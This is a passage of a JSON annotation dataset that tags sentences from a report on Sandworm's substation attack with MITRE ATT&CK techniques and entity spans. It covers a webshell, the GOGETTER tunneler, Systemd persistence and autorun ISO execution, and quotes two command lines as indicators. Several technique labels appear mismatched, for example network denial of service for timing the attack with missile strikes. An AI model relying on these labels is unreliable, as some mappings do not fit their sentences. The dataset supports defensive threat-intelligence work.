"text": "did not impact the hypervisor or the SCADA virtual machine.", "start": 90, "end": 149, "label": "Action" }, { "text": "hypervisor", "start": 109, "end": 119, "label": "Infrastructure_Indicator" }, { "text": "SCADA virtual machine.", "start": 127, "end": 149, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s22-643a33", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "However, we note that the wiper deployment was limited to the victim’s IT environment and did not impact the hypervisor or the SCADA virtual machine.", "sentence_text": "This is unusual since the threat actor had removed other forensic artifacts from the SCADA system in a possible attempt to cover their tracks, which would have been enhanced by the wiper activity.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Removes forensic artifacts from SCADA system while sparing OT infrastructure", "entities": [ { "text": "threat actor", "start": 26, "end": 38, "label": "ThreatActor" }, { "text": "removed other forensic artifacts", "start": 43, "end": 75, "label": "Action" }, { "text": "cover their tracks", "start": 123, "end": 141, "label": "Action" }, { "text": "SCADA system", "start": 85, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s23-ccc10b", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "This is unusual since the threat actor had removed other forensic artifacts from the SCADA system in a possible attempt to cover their tracks, which would have been enhanced by the wiper activity.", "sentence_text": "This could indicate a lack of coordination across different individuals or operational subteams involved in the attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s24-99f4a0", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "This could indicate a lack of coordination across different individuals or operational subteams involved in the attack.", "sentence_text": "A deeper dive on the attack lifecycle and OT capability can be found in the Technical Analysis section of the blog post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s25-d1f464", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "A deeper dive on the attack lifecycle and OT capability can be found in the Technical Analysis section of the blog post.", "sentence_text": "Sandworm’s Threat Activity Reveals Insights into Russia’s Offensive Cyber Capabilities Sandworm’s substation attack reveals notable insights into Russia’s continued investment in OT-oriented offensive cyber capabilities and overall approach to attacking OT systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s26-6bccd5", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Sandworm’s Threat Activity Reveals Insights into Russia’s Offensive Cyber Capabilities Sandworm’s substation attack reveals notable insights into Russia’s continued investment in OT-oriented offensive cyber capabilities and overall approach to attacking OT systems.", "sentence_text": "This incident and last year’s INDUSTROYER.V2 incident both show efforts to streamline OT attack capabilities through simplified deployment features.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Develops streamlined OT attack capabilities with simplified deployment", "entities": [ { "text": "INDUSTROYER.V2", "start": 30, "end": 44, "label": "MalwareTool" }, { "text": "streamline OT attack capabilities", "start": 75, "end": 108, "label": "Action" }, { "text": "simplified deployment features.", "start": 117, "end": 148, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s27-622203", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "This incident and last year’s INDUSTROYER.V2 incident both show efforts to streamline OT attack capabilities through simplified deployment features.", "sentence_text": "We observed the same efforts in our analysis of a series of documents detailing project requirements to enhance Russian offensive cyber capabilities Similarly, the evolution of suspected GRU-sponsored OT attacks shows a decrease in the scope of disruptive activities per attack.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Documents requirements to enhance offensive OT capabilities", "entities": [ { "text": "GRU", "start": 187, "end": 190, "label": "ThreatActor" }, { "text": "enhance Russian offensive cyber capabilities", "start": 104, "end": 148, "label": "Action" }, { "text": "decrease in the scope of disruptive activities per attack.", "start": 220, "end": 278, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s28-cb9e75", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "We observed the same efforts in our analysis of a series of documents detailing project requirements to enhance Russian offensive cyber capabilities Similarly, the evolution of suspected GRU-sponsored OT attacks shows a decrease in the scope of disruptive activities per attack.", "sentence_text": "By comparison, the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Refines OT malware by removing disruptive components and wiper modules", "entities": [ { "text": "INDUSTROYER.V2", "start": 19, "end": 33, "label": "MalwareTool" }, { "text": "lacked many of those same disruptive components", "start": 44, "end": 91, "label": "Action" }, { "text": "malware did not feature the wiper module", "start": 100, "end": 140, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s29-e18c46", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "By comparison, the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER.", "sentence_text": "While this shift likely reflects the increased tempo of wartime cyber operations, it also reveals the GRU’s priority objectives in OT attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s30-729b76", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "While this shift likely reflects the increased tempo of wartime cyber operations, it also reveals the GRU’s priority objectives in OT attacks.", "sentence_text": "Sandworm’s use of a native Living off the Land binary (LotLBin)\nto disrupt an OT environment shows a significant shift in techniques.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "Uses native Living off the Land binary to disrupt OT environment", "entities": [ { "text": "Sandworm’s", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "use of a native Living off the Land binary (LotLBin)", "start": 11, "end": 63, "label": "Action" }, { "text": "disrupt an OT environment", "start": 67, "end": 92, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s31-d13461", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "Sandworm’s use of a native Living off the Land binary (LotLBin)\nto disrupt an OT environment shows a significant shift in techniques.", "sentence_text": "Using tools that are more lightweight and generic than those observed in prior OT incidents, the actor likely decreased the time and resources required to conduct a cyber physical attack.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Employs lightweight generic tools for efficient cyber-physical attacks", "entities": [ { "text": "actor", "start": 97, "end": 102, "label": "ThreatActor" }, { "text": "Using tools that are more lightweight and generic", "start": 0, "end": 49, "label": "Action" }, { "text": "decreased the time and resources required", "start": 110, "end": 151, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s32-a3dcb0", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Using tools that are more lightweight and generic than those observed in prior OT incidents, the actor likely decreased the time and resources required to conduct a cyber physical attack.", "sentence_text": "LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments, but also for modifications to files already present within their installed OT applications and services.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "Leverages LotLBin techniques to evade detection by blending with legitimate OT processes", "entities": [ { "text": "LotLBin techniques ", "start": 0, "end": 19, "label": "Action" }, { "text": "make it difficult for defenders to detect threat activity", "start": 24, "end": 81, "label": "Action" }, { "text": "modifications to files already present within their installed OT applications ", "start": 184, "end": 262, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s33-2f7d6c", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments, but also for modifications to files already present within their installed OT applications and services.", "sentence_text": "As outlined in recent research detailing the GRU's disruptive playbook , we have observed Sandworm adopting LotL tactics across its wider operations to similarly increase the speed and scale at which it can operate while minimizing the odds of detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "Adopts LotL tactics across operations for speed, scale, and stealth", "entities": [ { "text": "Sandworm", "start": 90, "end": 98, "label": "ThreatActor" }, { "text": "GRU's ", "start": 45, "end": 51, "label": "ThreatActor" }, { "text": "adopting LotL tactics", "start": 99, "end": 120, "label": "Action" }, { "text": "increase the speed and scale", "start": 162, "end": 190, "label": "Action" }, { "text": "minimizing the odds of detection.", "start": 221, "end": 254, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s34-ef2d54", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "As outlined in recent research detailing the GRU's disruptive playbook , we have observed Sandworm adopting LotL tactics across its wider operations to similarly increase the speed and scale at which it can operate while minimizing the odds of detection.", "sentence_text": "While we lack sufficient evidence to assess a possible link, we note that the timing of the attack overlaps with Russian kinetic operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s35-00f6b2", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "While we lack sufficient evidence to assess a possible link, we note that the timing of the attack overlaps with Russian kinetic operations.", "sentence_text": "Sandworm potentially developed the disruptive capability as early as three weeks prior to the OT event, suggesting the attacker may have been waiting for a specific moment to deploy the capability.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "Develops disruptive OT capability and holds for strategic deployment timing", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "developed the disruptive capability", "start": 21, "end": 56, "label": "Action" }, { "text": " waiting for a specific moment to deploy", "start": 141, "end": 181, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s36-0679d6", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Sandworm potentially developed the disruptive capability as early as three weeks prior to the OT event, suggesting the attacker may have been waiting for a specific moment to deploy the capability.", "sentence_text": "The eventual execution of the attack coincided with the start of a multi-day set of coordinated missile strikes on critical infrastructure across several Ukrainian cities, including the city in which the victim was located.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1498", "name": "Network Denial of Service" } ], "procedure": "Coordinates cyber attack with kinetic missile strikes on critical infrastructure", "entities": [ { "text": " execution of the attack coincided", "start": 12, "end": 46, "label": "Action" }, { "text": "coordinated missile strikes on critical infrastructure", "start": 84, "end": 138, "label": "Action" }, { "text": "Ukrainian cities", "start": 154, "end": 170, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s37-55a926", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "The eventual execution of the attack coincided with the start of a multi-day set of coordinated missile strikes on critical infrastructure across several Ukrainian cities, including the city in which the victim was located.", "sentence_text": "Outlook\nThis attack represents an immediate threat to Ukrainian critical infrastructure environments leveraging the MicroSCADA supervisory control system.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Targets MicroSCADA systems in Ukrainian critical infrastructure", "entities": [ { "text": "Ukrainian critical infrastructure environments", "start": 54, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "MicroSCADA supervisory control system.", "start": 116, "end": 154, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s38-7a1af2", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Outlook\nThis attack represents an immediate threat to Ukrainian critical infrastructure environments leveraging the MicroSCADA supervisory control system.", "sentence_text": "Furthermore, our analysis of the activity suggests Russia would be capable of developing similar capabilities against other SCADA systems and programming languages beyond MicroSCADA and SCIL.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Develops scalable capabilities against multiple SCADA systems and programming languages", "entities": [ { "text": "Russia ", "start": 51, "end": 58, "label": "ThreatActor" }, { "text": "developing similar capabilities against other SCADA systems", "start": 78, "end": 137, "label": "Action" }, { "text": "SCADA systems", "start": 124, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "programming languages", "start": 142, "end": 163, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s39-26a60f", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "Furthermore, our analysis of the activity suggests Russia would be capable of developing similar capabilities against other SCADA systems and programming languages beyond MicroSCADA and SCIL.", "sentence_text": "We urge asset owners to review and implement the following recommendations to mitigate and detect this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s40-da36f2", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "We urge asset owners to review and implement the following recommendations to mitigate and detect this activity.", "sentence_text": "Acknowledgements\nThis research was made possible thanks to the hard work of many people not listed on the byline.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s41-d4402f", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Acknowledgements\nThis research was made possible thanks to the hard work of many people not listed on the byline.", "sentence_text": "This incident response engagement was funded through the UK’s Ukraine Cyber Programme (cross-government Conflict, Stability and Security Fund) and delivered by the United Kingdom’s Foreign, Commonwealth and Development Office.\nTechnical Analysis: Sandworm Attack Against Ukrainian Substations Initial Compromise and Maintaining Presence At this time, it is unknown how Sandworm gained initial access to the victim.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s42-820395", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "This incident response engagement was funded through the UK’s Ukraine Cyber Programme (cross-government Conflict, Stability and Security Fund) and delivered by the United Kingdom’s Foreign, Commonwealth and Development Office.\nTechnical Analysis: Sandworm Attack Against Ukrainian Substations Initial Compromise and Maintaining Presence At this time, it is unknown how Sandworm gained initial access to the victim.", "sentence_text": "Sandworm was first observed in the victim’s environment in June 2022, when the actor deployed the Neo-REGEORG webshell on an internet-facing server.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deploys Neo-REGEORG webshell on internet-facing server", "entities": [ { "text": "Sandworm ", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "Neo-REGEORG", "start": 98, "end": 109, "label": "MalwareTool" }, { "text": "internet-facing server.", "start": 125, "end": 148, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s43-179b98", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "Sandworm was first observed in the victim’s environment in June 2022, when the actor deployed the Neo-REGEORG webshell on an internet-facing server.", "sentence_text": "This is consistent with the group’s prior activity scanning and exploiting internet facing servers for initial access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Scans and exploits internet-facing servers for initial access", "entities": [ { "text": "group’s", "start": 28, "end": 35, "label": "ThreatActor" }, { "text": "scanning and exploiting internet facing servers", "start": 51, "end": 98, "label": "Action" }, { "text": "initial access", "start": 103, "end": 117, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s44-e07fa0", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "This is consistent with the group’s prior activity scanning and exploiting internet facing servers for initial access.", "sentence_text": "Roughly one month later, Sandworm deployed GOGETTER, which is a tunneler written in Golang that proxies communications for its command and control (C2) server using the open-source library Yamux over TLS.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Deploys GOGETTER Golang tunneler for C2 communications", "entities": [ { "text": "Sandworm", "start": 25, "end": 33, "label": "ThreatActor" }, { "text": "GOGETTER", "start": 43, "end": 51, "label": "MalwareTool" }, { "text": "tunneler written in Golang", "start": 64, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "command and control (C2) server", "start": 127, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "Yamux over TLS.", "start": 189, "end": 204, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s45-e68c3d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "Roughly one month later, Sandworm deployed GOGETTER, which is a tunneler written in Golang that proxies communications for its command and control (C2) server using the open-source library Yamux over TLS.", "sentence_text": "When leveraging GOGETTER, Sandworm utilized a Systemd service unit to maintain persistence on systems.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Sandworm utilized a Systemd service unit to maintain persistence on systems using GOGETTER.", "entities": [ { "text": "Sandworm", "start": 26, "end": 34, "label": "ThreatActor" }, { "text": "GOGETTER", "start": 16, "end": 24, "label": "MalwareTool" }, { "text": "utilized a Systemd service unit to maintain persistence on systems", "start": 35, "end": 101, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s46-fa0643", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "When leveraging GOGETTER, Sandworm utilized a Systemd service unit to maintain persistence on systems.", "sentence_text": "The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Maintains persistence via Systemd configuration file", "entities": [ { "text": "Sandworm ", "start": 44, "end": 53, "label": "ThreatActor" }, { "text": "Systemd configuration file leveraged", "start": 4, "end": 40, "label": "Action" }, { "text": "maintain persistence", "start": 74, "end": 94, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s47-b348a1", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems.", "sentence_text": "The value “WantedBy” defines when the program should be run; in the configuration used by Sandworm, the setting “multi-user.target” means that the program will be run when the host has reached a state when it will accept users logging on, for example after successful power on.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Configures Systemd WantedBy multi-user.target for automatic execution", "entities": [ { "text": "Sandworm", "start": 90, "end": 98, "label": "ThreatActor" }, { "text": "WantedBy” defines when the program should be run; ", "start": 11, "end": 61, "label": "Action" }, { "text": "multi-user.target” means that the program will be run ", "start": 113, "end": 167, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s48-22477f", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "The value “WantedBy” defines when the program should be run; in the configuration used by Sandworm, the setting “multi-user.target” means that the program will be run when the host has reached a state when it will accept users logging on, for example after successful power on.", "sentence_text": "This enables GOGETTER to maintain persistence across reboots.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Maintains persistence across reboots via Systemd service", "entities": [ { "text": "GOGETTER", "start": 13, "end": 21, "label": "MalwareTool" }, { "text": "maintain persistence across reboots.", "start": 25, "end": 61, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s49-e8aeb5", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "This enables GOGETTER to maintain persistence across reboots.", "sentence_text": "The “ExecStart” value specifies the path of the program to be run, which in this case was GOGETTER.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Configures ExecStart path to launch GOGETTER", "entities": [ { "text": " “ExecStart” value specifies the path of the program ", "start": 3, "end": 56, "label": "Action" }, { "text": "GOGETTER.", "start": 90, "end": 99, "label": "MalwareTool" } ] }, { "uid": "mitre-97_mitre_report-p1-s50-9109dc", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "The “ExecStart” value specifies the path of the program to be run, which in this case was GOGETTER.", "sentence_text": "When deploying GOGETTER, Mandiant observed Sandworm leverage Systemd service units designed to masquerade as legitimate or seemingly legitimate services.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Masquerades GOGETTER as legitimate Systemd services", "entities": [ { "text": "Sandworm", "start": 43, "end": 51, "label": "ThreatActor" }, { "text": "GOGETTER", "start": 15, "end": 23, "label": "MalwareTool" }, { "text": "masquerade as legitimate or seemingly legitimate services.", "start": 95, "end": 153, "label": "Action" }, { "text": "Systemd service units ", "start": 61, "end": 83, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s51-078558", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "When deploying GOGETTER, Mandiant observed Sandworm leverage Systemd service units designed to masquerade as legitimate or seemingly legitimate services.", "sentence_text": "Lateral Movement to SCADA Hypervisor and OT Attack Execution Sandworm utilized a novel technique to impact the OT environment by executing code within an End-of-Life (EOL) MicroSCADA control system and issuing commands that impacted the victim’s connected substations.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.002", "name": "Transmitted Data Manipulation" } ], "procedure": "Executes code in EOL MicroSCADA system to impact substations", "entities": [ { "text": "Sandworm", "start": 61, "end": 69, "label": "ThreatActor" }, { "text": "executing code within an End-of-Life (EOL) MicroSCADA control system ", "start": 129, "end": 198, "label": "Action" }, { "text": "issuing commands that impacted the victim’s connected substations.", "start": 202, "end": 268, "label": "Action" }, { "text": "substations.", "start": 256, "end": 268, "label": "Infrastructure_Indicator" }, { "text": "MicroSCADA control system", "start": 172, "end": 197, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s52-a2308a", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "Lateral Movement to SCADA Hypervisor and OT Attack Execution Sandworm utilized a novel technique to impact the OT environment by executing code within an End-of-Life (EOL) MicroSCADA control system and issuing commands that impacted the victim’s connected substations.", "sentence_text": "We note that given the attacker’s use of anti-forensics techniques, we were not able to recover all the artifacts from the intrusion.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Employs anti-forensics techniques to obscure intrusion artifacts", "entities": [ { "text": "attacker’s", "start": 23, "end": 33, "label": "ThreatActor" }, { "text": "use of anti-forensics techniques", "start": 34, "end": 66, "label": "Action" }, { "text": "not able to recover all the artifacts ", "start": 76, "end": 114, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s53-db6497", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "We note that given the attacker’s use of anti-forensics techniques, we were not able to recover all the artifacts from the intrusion.", "sentence_text": "To impact the OT systems, Sandworm accessed the hypervisor that hosted a SCADA management instance for the victim’s substation environment and leveraged an ISO image named \"a.iso\" as a virtual CD-ROM.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Mounts ISO image as virtual CD-ROM on SCADA hypervisor", "entities": [ { "text": "Sandworm", "start": 26, "end": 34, "label": "ThreatActor" }, { "text": "accessed the hypervisor", "start": 35, "end": 58, "label": "Action" }, { "text": "leveraged an ISO image named \"a.iso\" as a virtual CD-ROM", "start": 143, "end": 199, "label": "Action" }, { "text": "SCADA management instance", "start": 73, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "substation environment", "start": 116, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s54-8ff010", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "To impact the OT systems, Sandworm accessed the hypervisor that hosted a SCADA management instance for the victim’s substation environment and leveraged an ISO image named \"a.iso\" as a virtual CD-ROM.", "sentence_text": "The system was configured to permit inserted CD-ROMs to autorun.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Exploits autorun feature for CD-ROM execution", "entities": [ { "text": "system was configured to permit inserted CD-ROMs to autorun.", "start": 4, "end": 64, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s55-8168fb", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "The system was configured to permit inserted CD-ROMs to autorun.", "sentence_text": "The ISO file, at minimum, contained the following files: \"lun.vbs\" and \"n.bat\" as both files are referenced within the D volume and therefore contained within “a.iso”.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Packages malicious VBS and batch files in ISO image", "entities": [ { "text": "ISO file", "start": 4, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "lun.vbs", "start": 58, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "n.bat", "start": 72, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "a.iso", "start": 160, "end": 165, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s56-dedc5f", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "The ISO file, at minimum, contained the following files: \"lun.vbs\" and \"n.bat\" as both files are referenced within the D volume and therefore contained within “a.iso”.", "sentence_text": "The inserted ISO led to at least the following command lines execution:\nwscript.exe \"d:\\pack\\lun.vbs\"\ncmd /c \"D:\\pack\\n.bat\" Based on forensic analysis, we believe “lun.vbs” contents are the following (Figure 6):\nThe contents in Figure 6 indicate that “lun.vbs” executes “n.bat”.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Executes multi-stage payload via wscript and cmd from mounted ISO", "entities": [ { "text": "wscript.exe \"d:\\pack\\lun.vbs", "start": 72, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "cmd /c \"D:\\pack\\n.bat\"", "start": 102, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "“lun.vbs” executes “n.bat”.", "start": 252, "end": 279, "label": "Infrastructure_Indicator" }, { "text": "lun.vbs", "start": 253, "end": 260, "label": "Infrastructure_Indicator" }, { "text": "n.bat", "start": 272, "end": 277, "label": "Infrastructure_Indicator" }, { "text": "ISO", "start": 13, "end": 16, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s57-53463a", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "The inserted ISO led to at least the following command lines execution:\nwscript.exe \"d:\\pack\\lun.vbs\"\ncmd /c \"D:\\pack\\n.bat\" Based on forensic analysis, we believe “lun.vbs” contents are the following (Figure 6):\nThe contents in Figure 6 indicate that “lun.vbs” executes “n.bat”.", "sentence_text": "Additional fragments recovered include text consistent with Windows command line execution (Figure 7).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s58-8b871a", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "Additional fragments recovered include text consistent with Windows command line execution (Figure 7).", "sentence_text": "This fragment was identified by analyzing images from the host.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s59-f1681d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "This fragment was identified by analyzing images from the host.", "sentence_text": "Reconstruction of the host’s anti-virus logs indicates “lun.vbs” and “n.bat” were executed in close time proximity.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Executes lun.vbs and n.bat in close succession", "entities": [ { "text": "lun.vbs", "start": 56, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "n.bat", "start": 70, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "executed in close time proximity.", "start": 82, "end": 115, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s60-a717ba", "source": "mitre", "doc_id": 